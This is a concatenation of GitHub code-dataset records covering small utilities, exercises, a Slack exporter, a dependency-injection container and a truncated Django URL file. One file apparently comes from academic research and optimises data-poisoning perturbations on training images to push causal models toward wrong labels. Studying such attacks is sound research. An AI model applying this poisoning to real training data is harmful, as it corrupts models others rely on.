neither NPYFILE nor `-T\\' is provided, then '\n 'raw bytes of an npy file will be expected from stdin. '\n 'If both NPYFILE and `-T\\' are provided, then '\n 'the union of them will be used.'))\n return parser\n\n\ndef decide_input_files(args):\n global errno\n filenames = []\n if args.from_file == '-':\n filenames.extend(x.rstrip('\\n') for x in sys.stdin)\n if not filenames and not args.npyfiles:\n logging.info('nothing to load; aborted')\n sys.exit(errno)\n elif args.from_file:\n try:\n with open(args.from_file) as infile:\n filenames.extend(x.rstrip('\\n') for x in infile)\n except OSError as err:\n logging.warning('failed to load NPYFILEs from \"%s\" due to %s',\n args.from_file, err)\n errno |= ERRNO_READ\n if not filenames and not args.npyfiles:\n logging.info('nothing to load; aborted')\n sys.exit(errno)\n if args.npyfiles:\n filenames.extend(args.npyfiles)\n return filenames or None\n\n\ndef read_data(filenames):\n all_data = []\n if filenames:\n for filename in filenames:\n try:\n data = np.load(filename)\n except OSError as err:\n logging.error('failed to load \"%s\" due to %s', filename, err)\n sys.exit(errno | ERRNO_READ)\n if hasattr(data, 'keys'):\n data.close()\n logging.error('failed to load \"%s\" as npy file', filename)\n sys.exit(errno | ERRNO_READ)\n logging.debug('loaded data of shape %s from \"%s\"', data.shape,\n filename)\n all_data.append(data)\n else:\n with io.BytesIO() as cbuf:\n shutil.copyfileobj(sys.stdin.buffer, cbuf)\n cbuf.seek(0)\n try:\n data = np.load(cbuf)\n except OSError as err:\n logging.error('failed to load from \"/dev/stdin\" due to %s',\n err)\n sys.exit(errno | ERRNO_READ)\n if hasattr(data, 'keys'):\n data.close()\n logging.error('failed to load \"/dev/stdin\" as npy file')\n sys.exit(errno | ERRNO_READ)\n logging.debug('loaded data of shape %s from \"/dev/stdin\"',\n data.shape)\n all_data.append(data)\n return all_data\n\n\ndef merge_data(args, all_data):\n if len(all_data) > 1:\n merge = np.stack if args.stack else np.concatenate\n try:\n result = merge(all_data, axis=args.dim)\n except ValueError as err:\n logging.error('failed to %s arrays due to %s',\n 'stack' if args.stack else 'concatenate', err)\n sys.exit(errno | ERRNO_DATA)\n else:\n result = all_data[0]\n logging.debug('result shape = %s', result.shape)\n return result\n\n\ndef write_data(args, result):\n if args.output:\n if args.textwrite:\n try:\n with open(args.output, 'w') as outfile:\n np.savetxt(outfile, result)\n except (OSError, ValueError) as err:\n logging.error('failed to write result to \"%s\" due to %s',\n args.output, err)\n sys.exit(errno | ERRNO_WRITE)\n logging.info('written result to \"%s\"', args.output)\n else:\n try:\n with open(args.output, 'wb') as outfile:\n np.save(outfile, result)\n except OSError as err:\n logging.error('failed to write result to \"%s\" due to %s',\n args.output, err)\n sys.exit(errno | ERRNO_WRITE)\n logging.info('written result to \"%s\"', args.output)\n else:\n if args.textwrite:\n with io.StringIO() as cbuf:\n try:\n np.savetxt(cbuf, result)\n except (OSError, ValueError) as err:\n logging.error(\n 'failed to write result to \"/dev/stdout\" '\n 'due to %s', err)\n sys.exit(errno | ERRNO_WRITE)\n cbuf.seek(0)\n shutil.copyfileobj(cbuf, sys.stdout)\n logging.info('written result to \"/dev/stdout\"')\n else:\n with io.BytesIO() as cbuf:\n np.save(cbuf, result)\n cbuf.seek(0)\n shutil.copyfileobj(cbuf, sys.stdout.buffer)\n logging.info('written result to \"/dev/stdout\"')\n\n\ndef main():\n logging.basicConfig(\n format='%(filename)s: %(levelname)s: %(message)s', level=LOGGING_LEVEL)\n args = make_parser().parse_args()\n filenames = decide_input_files(args)\n logging.debug('input filenames = %s', filenames or '/dev/stdin')\n all_data = read_data(filenames)\n if not all_data:\n logging.debug('loaded nothing; aborted')\n return\n result = merge_data(args, all_data)\n write_data(args, result)\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n logging.warning('written data may have corrupted due to interrupt')\n errno |= ERRNO_WRITE | ERRNO_INT\n except BrokenPipeError:\n logging.warning('written data may have corrupted due to broken pipe')\n sys.stderr.close()\n errno |= ERRNO_WRITE\n finally:\n sys.exit(errno)\n","repo_name":"kkew3/npyzutils","sub_path":"src/npycat.py","file_name":"npycat.py","file_ext":"py","file_size_in_byte":7587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12154454347","text":"import pandas\n\nstudent_dict = { # formatted for pandas - > (key, list)\n \"student\": [\"Angela\", \"James\", \"Lily\"],\n \"score\": [56, 76, 98]\n}\n\nstudent_data = pandas.DataFrame(student_dict)\nprint(student_data, \"\\n\")\n\nfor (index, row) in student_data.iterrows(): # .iterrows() taps into row\n print(row) # (r)\n if row.student == \"Angela\": # searches for student name string\n print(\"\\n\", row.score, \"\\n\") # prints score int (a)\n\n# p(r): student Angela\n# score 56\n# Name: 0, dtype: object\n\n# p(a): 56\n","repo_name":"The-Captain-William/100-Days-Of-Python","sub_path":"day_26_list_comprehension/dictionary_comprehension_with_pandas.py","file_name":"dictionary_comprehension_with_pandas.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"32873245811","text":"# Definition for a Node.\nclass Node(object):\n def __init__(self, x, next=None, random=None):\n self.val = int(x)\n self.next = next\n self.random = random\n\n\nclass Solution(object):\n \"\"\"\n请实现 copyRandomList 函数,复制一个复杂链表。在复杂链表中,每个节点除了有一个 next\n指针指向下一个节点,还有一个 random 指针指向链表中的任意节点或者 null。\n输入:head = [[7,null],[13,0],[11,4],[10,2],[1,0]]\n输出:[[7,null],[13,0],[11,4],[10,2],[1,0]]\n输入:head = [[1,1],[2,1]]\n输出:[[1,1],[2,1]]\n输入:head = [[3,null],[3,0],[3,null]]\n输出:[[3,null],[3,0],[3,null]]\n输入:head = []\n输出:[]\n解释:给定的链表为空(空指针),因此返回 null。\n-10000 <= Node.val <= 10000\nNode.random 为空(null)或指向链表中的节点。节点数目不超过 1000 。\n注意:本题与主站 138 题相同:https://leetcode-cn.com/problems/copy-list-with-random-pointer/\n链接:https://leetcode-cn.com/problems/fu-za-lian-biao-de-fu-zhi-lcof\n \"\"\"\n def copyRandomList(self, head):\n \"\"\"\n :type head: Node\n :rtype: Node\n \"\"\"\n def dfs(node):\n if not node:\n return None\n if node in rec:\n return rec[node]\n new = Node(node.val)\n rec[node] = new\n new.next = dfs(node.next)\n new.random = dfs(node.random)\n return new\n\n rec = {}\n return dfs(head)\n\n\ndef create(nums):\n aux = p = Node(0)\n rec = []\n for x in nums:\n p.next = Node(x[0])\n p = p.next\n rec.append(p)\n for i, x in enumerate(nums):\n if x[1] is not None:\n rec[i].random = rec[x[1]]\n return aux.next\n\n\ndef main():\n nums = [[7, None], [13, 0], [11, 4], [10, 2], [1, 0]]\n nums = [[1, 1], [2, 1]]\n nums = [[3, None], [3, 0], [3, None]]\n # nums = []\n test = Solution()\n ret = test.copyRandomList(create(nums))\n print(ret)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jackyzzk/Coding-Interviews-2","sub_path":"剑指offer-面试题35. 复杂链表的复制-dfs.py","file_name":"剑指offer-面试题35. 复杂链表的复制-dfs.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31037928752","text":"# ******************************************************************************\r\n# Author: Jason Neblett\r\n# Lab: Lab 6\r\n# Date: 02/20/2022\r\n# Description: Classes and Objects\r\n# Input: Dictionary of names, dates, gender, and number \r\n# Output: Dictionary List of names, dates, gender and number\r\n\r\n\r\nfrom Name import *\r\nfrom Database import Database\r\n\r\n\r\ndef main():\r\n names = Name.readNames(cls)\r\n for names in names:\r\n print(f\"{names['name']}\\t{names['year']}\\t{names['gender']}\\t{names['Count']}\")\r\n\r\n year = Database.year()\r\n gender = Database.gender()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"jasonneblett/Lab6","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38725297813","text":"\"\"\"Main class, holding information about models and training/testing routines.\"\"\"\n\nimport torch\nimport time\nfrom ..consts import BENCHMARK\nfrom ..utils import cw_loss\nimport pdb\nimport random\ntorch.backends.cudnn.benchmark = BENCHMARK\n\nfrom .forgemaster_base import _Forgemaster\nfrom ..consts import NON_BLOCKING, BENCHMARK\n\nclass ForgemasterTargeted_both_causal(_Forgemaster):\n\n def _initialize_forge(self, client, furnace):\n \"\"\"Implement common initialization operations for forgeing.\"\"\"\n client.eval(dropout=True)\n # The PGD tau that will actually be used:\n # This is not super-relevant for the adam variants\n # but the PGD variants are especially sensitive\n # E.G: 92% for PGD with rule 1 and 20% for rule 2\n if self.args.attackoptim in ['PGD', 'GD']:\n # Rule 1\n #self.tau0 = self.args.eps / 255 / furnace.ds * self.args.tau * (self.args.pbatch / 512) / self.args.ensemble\n self.tau0 = self.args.eps / 255 / furnace.ds * self.args.tau\n\n elif self.args.attackoptim in ['momSGD', 'momPGD']:\n # Rule 1a\n self.tau0 = self.args.eps / 255 / furnace.ds * self.args.tau * (self.args.pbatch / 512) / self.args.ensemble\n self.tau0 = self.tau0.mean()\n else:\n # Rule 2\n self.tau0 = self.args.tau * (self.args.pbatch / 512) / self.args.ensemble\n\n if self.args.full_data:\n dataloader = furnace.trainloader\n else:\n dataloader = furnace.poisonloader\n\n #update class_mu for causal_criterion\n mu = [torch.zeros(1, client.causal_model.hid_channels) for _ in range(furnace.num_class)]\n num = [0 for _ in range(furnace.num_class)]\n for batch, example in enumerate(dataloader):\n inputs, labels, ids = example\n inputs = inputs.to(**self.setup)\n labels_cuda = labels.to(dtype=torch.long, device=self.setup['device'], non_blocking=NON_BLOCKING)\n\n if 's' in self.args.causal_loss_type:\n with torch.no_grad():\n rep = client.causal_model.get_causal_rep(inputs).cpu()\n else:\n x_s, x_v, x_v_att = client.causal_model.split_x(inputs, labels_cuda, eval=True)\n with torch.no_grad():\n rep = client.causal_model.get_conf_rep(x_v).cpu()\n for i in range(inputs.size(0)):\n mu[labels[i]] += rep[i]\n num[labels[i]] += 1\n for j in range(furnace.num_class):\n mu[j] /= num[j]\n client.causal_criterion.update_mu(torch.cat(mu, dim=0).to(**self.setup))\n\n\n\n def _define_objective(self, inputs, labels):\n \"\"\"Implement the closure here.\"\"\"\n def closure(model, criterion, optimizer, causal_model, causal_criterion):\n \"\"\"This function will be evaluated on all GPUs.\"\"\" # noqa: D401\n outputs = model(inputs)\n new_labels = self._label_map(outputs, labels)\n\n causal_criterion.loss_type = self.args.causal_loss_type\n causal_criterion.beta = 1\n s_loss = causal_criterion.run(causal_model, inputs, labels, new_labels)\n s_loss.backward(retain_graph=self.retrain)\n\n # add causal_loss\n causal_criterion.loss_type = 'perturb_v_output'\n causal_criterion.beta = self.args.causal_beta\n v_loss = causal_criterion.run(causal_model, inputs, labels, new_labels)\n #loss = s_loss + v_loss\n\n v_loss.backward(retain_graph=self.retain)\n prediction = (outputs.data.argmax(dim=1) == new_labels).sum()\n\n return loss.detach().cpu(), prediction.detach().cpu()\n return closure\n\n def _label_map(self, outputs, labels):\n # This is a naiive permutation on the label space. You can implement\n # any permutation you like here.\n new_labels = (labels + 1) % outputs.shape[1]\n return new_labels\n\n def _run_trial(self, client, furnace):\n \"\"\"Run a single trial.\"\"\"\n poison_delta = furnace.initialize_poison()\n if self.args.full_data:\n dataloader = furnace.trainloader\n else:\n dataloader = furnace.poisonloader\n\n if self.args.attackoptim in ['Adam', 'signAdam', 'momSGD', 'momPGD']:\n # poison_delta.requires_grad_()\n if self.args.attackoptim in ['Adam', 'signAdam']:\n att_optimizer = torch.optim.Adam([poison_delta], lr=self.tau0, weight_decay=0)\n else:\n att_optimizer = torch.optim.SGD([poison_delta], lr=self.tau0, momentum=0.9, weight_decay=0)\n if self.args.scheduling:\n scheduler = torch.optim.lr_scheduler.MultiStepLR(att_optimizer, milestones=[self.args.attackiter // 2.667, self.args.attackiter // 1.6,\n self.args.attackiter // 1.142], gamma=0.1)\n poison_delta.grad = torch.zeros_like(poison_delta)\n dm, ds = furnace.dm.to(device=torch.device('cpu')), furnace.ds.to(device=torch.device('cpu'))\n poison_bounds = torch.zeros_like(poison_delta)\n else:\n poison_bounds = None\n\n for step in range(self.args.attackiter):\n if step % 10 == 0:\n print(f'Step {step}')\n if step == self.args.attackiter // 2 and self.args.causal_reverse:\n if self.args.causal_loss_type == \"perturb_s_output\":\n client.causal_criterion.loss_type = \"perturb_v_output_min\"\n elif self.args.causal_loss_type == \"perturb_v_output\":\n client.causal_criterion.loss_type = \"perturb_s_output_min\"\n target_losses = 0\n poison_correct = 0\n for batch, example in enumerate(dataloader):\n if batch == 0:\n start = time.time()\n elif batch % 100 == 0:\n end = time.time()\n avg = (end-start)/100\n start = end\n print(f'average time per epoch: {len(dataloader) * avg}')\n loss, prediction = self._batched_step(poison_delta, poison_bounds, example, client, furnace)\n target_losses += loss\n poison_correct += prediction\n\n if self.args.dryrun:\n break\n\n # Note that these steps are handled batch-wise for PGD in _batched_step\n # For the momentum optimizers, we only accumulate gradients for all poisons\n # and then use optimizer.step() for the update. This is math. equivalent\n # and makes it easier to let pytorch track momentum.\n if self.args.attackoptim in ['Adam', 'signAdam', 'momSGD', 'momPGD']:\n if self.args.attackoptim in ['momPGD', 'signAdam']:\n poison_delta.grad.sign_()\n att_optimizer.step()\n if self.args.scheduling:\n scheduler.step()\n att_optimizer.zero_grad()\n with torch.no_grad():\n # Projection Step\n poison_delta.data = torch.max(torch.min(poison_delta, self.args.eps /\n ds / 255), -self.args.eps / ds / 255)\n poison_delta.data = torch.max(torch.min(poison_delta, (1 - dm) / ds -\n poison_bounds), -dm / ds - poison_bounds)\n\n target_losses = target_losses / (batch + 1)\n poison_acc = poison_correct / len(dataloader.dataset)\n if step % (self.args.attackiter // 5) == 0 or step == (self.args.attackiter - 1):\n print(f'Iteration {step}: Target loss is {target_losses:2.4f}, '\n f'Poison clean acc is {poison_acc * 100:2.2f}%')\n\n if self.args.step:\n if self.args.clean_grad:\n client.step(furnace, None, self.targets, self.true_classes)\n else:\n client.step(furnace, poison_delta, self.targets, self.true_classes)\n\n if self.args.dryrun:\n break\n\n return poison_delta, target_losses\n","repo_name":"Thinklab-SJTU/DICE","sub_path":"poison/village/shop/forgemaster_targeted_both_causal.py","file_name":"forgemaster_targeted_both_causal.py","file_ext":"py","file_size_in_byte":8260,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"29804926899","text":"import threading\n\nfrom cursed_snake.controller.game_controller import run_game_loop\nfrom cursed_snake.server.http_server import start_server\n\n\ndef main() -> None:\n tasks = [start_server]\n for task in tasks:\n thread = threading.Thread(target=task)\n thread.start()\n run_game_loop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"stewartHutchins/cursed-snake","sub_path":"game/src/cursed_snake/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13960224381","text":"import requests\nimport json\nimport argparse\nimport codecs\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--channel\", type=str, required=True, help=\"SlackのチャネルIDを設定します。[必須]\")\n parser.add_argument(\"--out\", type=str, required=True, help=\"Jsonファイル名を指定します。フルパス指定可\")\n return parser.parse_args()\n\n\ndef get_conversations(args):\n messages = []\n url = \"https://slack.com/api/conversations.history\"\n token = \"xxxx-xxxxxxxxxxx-xxxxxxxxxxx-xxxxxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\n\n header = {\n \"Authorization\": \"Bearer {}\".format(token)\n }\n\n payload = {}\n payload.update({\"channel\": args.channel})\n\n response = requests.get(url, headers=header, params=payload)\n response_dic = response.json()\n messages.append(response_dic[\"messages\"])\n while True:\n next_cursor = \"\"\n try:\n if (\"response_metadata\" in response_dic) and (len(response_dic[\"response_metadata\"][\"next_cursor\"]) > 0):\n next_cursor = response_dic[\"response_metadata\"][\"next_cursor\"]\n else:\n break\n except KeyError:\n break\n payload.update({\"cursor\": next_cursor})\n response = requests.get(url, headers=header, params=payload)\n response_dic = response.json()\n messages.append(response_dic[\"messages\"])\n\n return messages\n\n\nif __name__ == \"__main__\":\n # 実行パラメタ解析\n args = parse_args()\n messages_group = get_conversations(args)\n\n msg_dicts = []\n for i, messages in enumerate(messages_group):\n if i == 0:\n msg_dicts = messages\n continue\n for message in messages:\n msg_dicts.append(message)\n\n # 解析結果のjsonファイル吐き出し\n with codecs.open(args.out, 'w', 'utf-8') as outfile:\n json.dump(msg_dicts, outfile, ensure_ascii=False, indent=4)\n\n","repo_name":"srvhat09/slack_getChannel","sub_path":"slack_getChannel.py","file_name":"slack_getChannel.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11357791955","text":"from datetime import datetime\nimport logging\nfrom pprint import pformat\n\nfrom ploceidae.dependency.dependency_wrapper import DependencyWrapper\nfrom ploceidae.dependency.dependency_wrapper_helper_methods import DependencyWrapperHelperMethods\nfrom ploceidae.container.partial_injection import PartialInjection\n\nlogger = logging.getLogger(__name__)\n\n__all__ = [\"Container\"]\n\n\nclass Container(object):\n\n def __init__(self, dependency_graph_manager):\n self.dependency_graph_manager = dependency_graph_manager\n\n def wire_dependencies(self, object_to_wire_up, *dependencies_to_ignore):\n return self.partially_wire_dependencies(object_to_wire_up, *dependencies_to_ignore)()\n\n def partially_wire_dependencies(self, object_to_wire_up, *dependencies_to_ignore):\n DependencyWrapperHelperMethods.input_validation_for_dependency_object(object_to_wire_up)\n\n dependency_wrapper = DependencyWrapper.get_dependency_without_decoration(object_to_wire_up, None, self.dependency_graph_manager)\n\n return self.partially_wire_dependencies_inner(dependency_wrapper, dependencies_to_ignore, object_to_wire_up)\n\n def partially_wire_dependencies_inner(self, dependency_wrapper, dependencies_to_ignore, object_to_wire_up):\n time_stamp = datetime.now()\n resolved_dependencies = self.dependency_graph_manager.resolve_dependencies(dependency_wrapper, time_stamp,\n *dependencies_to_ignore)\n args_to_apply_as_dict = self.get_args_to_apply_as_dict(dependency_wrapper, dependencies_to_ignore,\n resolved_dependencies)\n args_to_apply_as_group = resolved_dependencies.resolved_dependencies_by_group\n\n self.log_partial_injection_data(dependency_wrapper, dependencies_to_ignore, args_to_apply_as_dict, args_to_apply_as_group)\n partial_injection = PartialInjection(object_to_wire_up, dependencies_to_ignore, *args_to_apply_as_group,\n **args_to_apply_as_dict)\n return self.generate_partial_injection(partial_injection, object_to_wire_up, time_stamp)\n\n def generate_partial_injection(self, partial_injection, object_to_wire_up, time_stamp):\n def nested(*args, **kwargs):\n #logger.debug(\"calling replacing alt keys callback\")\n ret = partial_injection(*args, **kwargs)\n self.dependency_graph_manager.replace_alt_keys_with_valid_dependency_lifetime_from_instance(ret, object_to_wire_up, time_stamp)\n return ret\n return nested\n\n @staticmethod\n def log_partial_injection_data(wrapped_dependency_object, dependencies_to_ignore, args_to_apply_as_dict, args_to_apply_as_group):\n message = \"\\n\\nfor {0} ignoring: \\n{1}\\napplying as dict: \\n{2}\\napplying as group: \\n{3}\\n\"\n data = map(pformat, (dependencies_to_ignore, args_to_apply_as_dict, args_to_apply_as_group))\n #logger.info(message.format(wrapped_dependency_object.dependency_name, *data))\n\n @staticmethod\n def get_args_to_apply_as_dict(wrapped_dependency_object, dependencies_to_ignore, resolved_dependencies):\n enumerator_on_dependencies = enumerate(filter(lambda dependency: dependency not in dependencies_to_ignore, wrapped_dependency_object.dependencies))\n return {dependency: resolved_dependencies.resolved_dependencies[index] for index, dependency in enumerator_on_dependencies}\n","repo_name":"MATTHEWFRAZER/ploceidae","sub_path":"ploceidae/container/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24939136537","text":"n = int(input()) # количество танцоров\np = int(input()) # номер танцора\nk = int(input()) # количество шагов\nArr = []\nfor i in range(n):\n Arr.append(i + 1)\nk_pos = k % n\nfor i in range(k_pos):\n if i % 2 == 0:\n for m in range(0, n, 2):\n Arr[m], Arr[m + 1] = Arr[m + 1], Arr[m]\n else:\n Arr[0], Arr[n - 1] = Arr[n - 1], Arr[0]\n for g in range(1, n - 2, 2):\n Arr[g], Arr[g + 1] = Arr[g + 1], Arr[g]\n print(Arr)\nfor i in range(n):\n if Arr[i] == p:\n if Arr[i] == Arr[0]:\n if Arr[-1] > Arr[1]:\n print(Arr[1], Arr[-1])\n break\n else:\n print(Arr[-1], Arr[1])\n break\n if Arr[i] == Arr[-1]:\n if Arr[-2] > Arr[0]:\n print(Arr[0], Arr[-2])\n break\n else:\n print(Arr[-2], Arr[0])\n break\n print(Arr[i - 1], Arr[i + 1])","repo_name":"picto7/work_207","sub_path":"olympiada/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71429136488","text":" \nfrom pyspark import SparkContext \nfrom pyspark.streaming import StreamingContext \nfrom pyspark.streaming.kafka import KafkaUtils \n \nsc = SparkContext(appName=\"FilterSensorData\") \nscc = StreamingContext(sc,1) \n \n#Replace with DNS of instance running Zookeeper \nzkQuorum = \"ip-172-31-33-135.ec2.internal:2181\" \ntopic = \"forestfire\" \n \nkvs = KafkaUtils.createStream(ssc, zkQuorum, \n \"spark-streaming-consumer\", {topic:1}) \nlines = kvs.map(lambda x: x[1]) \n \nsplitlines = lines.map(lambda line: line.split(',')) \nfilteredlines = splitlines.filter(lambda line: int(line[1])>20 and \n int(line[2])>20 and int(line[3])>6000 \n and int(line[4])>200) \n \nfilteredlines.pprint() \n \nssc.start() \nssc.awaitTermination()\n","repo_name":"arshdeepbahga/cloud-computing-solutions-architect-book-code","sub_path":"Chapter-11/sensor-data-analysis/filtering.py","file_name":"filtering.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"5430541108","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 25 15:47:32 2020\n\n@author: santi\n\"\"\"\n\n\ndef lista_divisores(n):\n \"\"\"\n Recibe un numero n y devuelve una lista de sus divisores\n\n \"\"\" \n lista = []\n for i in range(1,n):\n if n % i == 0:\n lista.append(i)\n return lista\n\ndef suma_divisores(n):\n \"\"\"\n Recibe un numero n y devuelve la suma de sus divisores\n\n \"\"\" \n suma = 0\n for i in lista_divisores(n):\n suma += i\n return suma\n\ndef es_abundante(a):\n return a < suma_divisores(a)\n\nlista = []\nlista2 = []\n\n\nfor i in range(12,28123):\n if es_abundante(i):\n lista.append(i)\n \nfor i in lista:\n for p in lista[lista.index(i):]:\n if (i+p) <= 28123:\n lista2.append(i+p)\n \nlista2 = list(dict.fromkeys(lista2))\n\nsuma = ((28123*28124)/2) - sum(lista2)\n\n \n ","repo_name":"santiperone/ProjectEuler","sub_path":"23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20919991507","text":"from django.contrib import admin\nfrom django.apps import apps\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom s_admin.forms import CustomUserCreationForm, CustomUserChangeForm\nfrom s_admin.models import *\n\n# Register your models here.\n \nclass ProfileInline(admin.StackedInline):\n model = UserProfile\n can_delete = False\n verbose_name_plural = 'UserProfile'\n fk_name = 'user'\n\nclass CustomUserAdmin(UserAdmin):\n inlines = (ProfileInline, )\n \n add_form = CustomUserCreationForm\n form = CustomUserChangeForm\n model = CustomUser\n list_display = (\"email\", \"is_staff\", \"is_active\",)\n list_filter = (\"email\", \"is_staff\", \"is_active\",)\n list_select_related = ('user_profile', ) \n fieldsets = (\n (None, {\"fields\": (\"email\", \"password\")}),\n (\"Permissions\", {\"fields\": (\"is_staff\", \"is_active\", \"groups\", \"user_permissions\")}),\n )\n add_fieldsets = (\n (None, {\n \"classes\": (\"wide\",),\n \"fields\": (\n \"email\", \"password1\", \"password2\", \"is_staff\",\n \"is_active\", \"groups\", \"user_permissions\"\n )}\n ),\n )\n search_fields = (\"email\",)\n ordering = (\"email\",)\n \n\n def get_inline_instances(self, request, obj=None):\n if not obj:\n return list()\n return super(CustomUserAdmin, self).get_inline_instances(request, obj)\n\n# newModels = apps.get_models()\n\n# admin.site.unregister(CustomUser)\nadmin.site.register(CustomUser, CustomUserAdmin)\nadmin.site.register(UserProfile)\n\nadmin.site.register(OrganizationSetting)\nadmin.site.register(Zone)\nadmin.site.register(Area)\nadmin.site.register(ZoneGroup)\nadmin.site.register(Streets)\nadmin.site.register(FeeSettings)\nadmin.site.register(RoleSettings)\nadmin.site.register(PermissionSettings)\n# admin.site.register(RolePermissions)\n\n\nadmin.site.site_header = \"Shine Co-Operative Society\"\n\n# admin.site.site_header = 'Awesome Inc. Administration'\nadmin.site.site_title = 'Shine Co-Operative Society'","repo_name":"adroit48Dev/danshine","sub_path":"s_admin/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26594802052","text":"\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager\nfrom matplotlib import style\nstyle.use('ggplot') or plt.style.use('ggplot')\nfrom sklearn.decomposition import PCA\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import scale\nimport warnings\n\n#%% se importan y se describen los datos\nwarnings.filterwarnings('ignore')\n\ndatos = pd.read_excel(\"Anexo 2 - Datos depurados.xlsx\")\ndatos.info()\n\nprint('Varianza de cada variable')\nprint(datos.var(axis=0))\n\n#%% Entrenamiento modelo PCA con escalado de los datos\n\npca_pipe = make_pipeline(StandardScaler(), PCA())\npca_pipe.fit(datos)\n\n# Se extrae el modelodel pipeline\nmodelo_pca = pca_pipe.named_steps['pca']\n\n#%% Se combierte el array a dataframe para añadir nombres a los ejes.\npd.DataFrame( data=modelo_pca.components_, columns=datos.columns, index=['Patentes', 'PIB per capita', 'Inversion i+d', 'Calidad institucional', \"Penetración de internet\"])\n\n\n\nfig, ax = plt.subplots(nrows=1, ncols=1, figsize=(4, 2))\ncomponentes = modelo_pca.components_\nplt.imshow(componentes.T, cmap='viridis', aspect='auto')\nplt.yticks(range(len(datos.columns)), datos.columns)\nplt.xticks(range(len(datos.columns)), np.arange(modelo_pca.n_components_) + 1)\nplt.grid(False)\nplt.colorbar()\nplt.show()\n\n#%% Porcentaje de varianza explicada por cada componente\n\n\nprint('Porcentaje de varianza explicada por cada componente')\n\nprint(modelo_pca.explained_variance_ratio_)\n\nfig, ax = plt.subplots(nrows=1, ncols=1, figsize=(6, 4))\nax.bar(x=np.arange(modelo_pca.n_components_) + 1, height=modelo_pca.explained_variance_ratio_)\n\nfor x, y in zip(np.arange(len(datos.columns)) + 1, modelo_pca.explained_variance_ratio_):\n label = round(y, 2)\n ax.annotate(label, (x, y), textcoords=\"offset points\", xytext=(0,10), ha='center')\n\n\nax.set_xticks(np.arange(modelo_pca.n_components_) + 1)\nax.set_ylim(0, 1.1)\nax.set_title('Proporción de varianza explicada por cada componente')\nax.set_xlabel('Componente principal')\nax.set_ylabel('Proporción varianza explicada')\nplt.show()\n\n# Porcentaje de varianza explicada acumulada\n\nprop_varianza_acum = modelo_pca.explained_variance_ratio_.cumsum()\n\nprint('Porcentaje de varianza explicada acumulada')\n\nprint(prop_varianza_acum)\n\n\nfig, ax = plt.subplots(nrows=1, ncols=1, figsize=(6, 4))\nax.bar(x=np.arange(modelo_pca.n_components_) + 1, height=modelo_pca.explained_variance_ratio_)\n\nfor x, y in zip(np.arange(len(datos.columns)) + 1, modelo_pca.explained_variance_ratio_):\n label = round(y, 2)\n ax.annotate(label, (x, y), textcoords=\"offset points\", xytext=(0, 10), ha='center')\n\nax.set_xticks(np.arange(modelo_pca.n_components_) + 1)\nax.set_ylim(0, 1.1)\nax.set_title('Porcentaje de varianza explicada por cada componente')\nax.set_xlabel('Componente principal')\nax.set_ylabel('Por. varianza explicada')\n\n# Porcentaje de varianza explicada acumulada\n\nprop_varianza_acum = modelo_pca.explained_variance_ratio_.cumsum()\nprint('Porcentaje de varianza explicada acumulada')\nprint(prop_varianza_acum)\nfig, ax = plt.subplots(nrows=1, ncols=1, figsize=(6, 4))\nax.plot(np.arange(len(datos.columns)) + 1, prop_varianza_acum, marker='o')\n\nfor x, y in zip(np.arange(len(datos.columns)) + 1, prop_varianza_acum):\n label = round(y, 2)\n ax.annotate(label, (x, y), textcoords=\"offset points\", xytext=(0, 10), ha='center')\n\nax.set_ylim(0, 1.1)\nax.set_xticks(np.arange(modelo_pca.n_components_) + 1)\nax.set_title('Proporción de varianza explicada acumulada')\nax.set_xlabel('Componente principal')\nax.set_ylabel('Por. varianza acumulada')\nplt.show()\n\n","repo_name":"Danezc/Medici-n-de-la-innovaci-n-tecnologica-usando-MC","sub_path":"Anexo 7 - PCA test.py","file_name":"Anexo 7 - PCA test.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8825756824","text":"from django.urls import path, re_path\n\nfrom api.applications.views import application_views as views\nfrom api.applications.views import application_document_views as document_views\n\nurlpatterns = [\n path(\n 'funds//company-documents/',\n 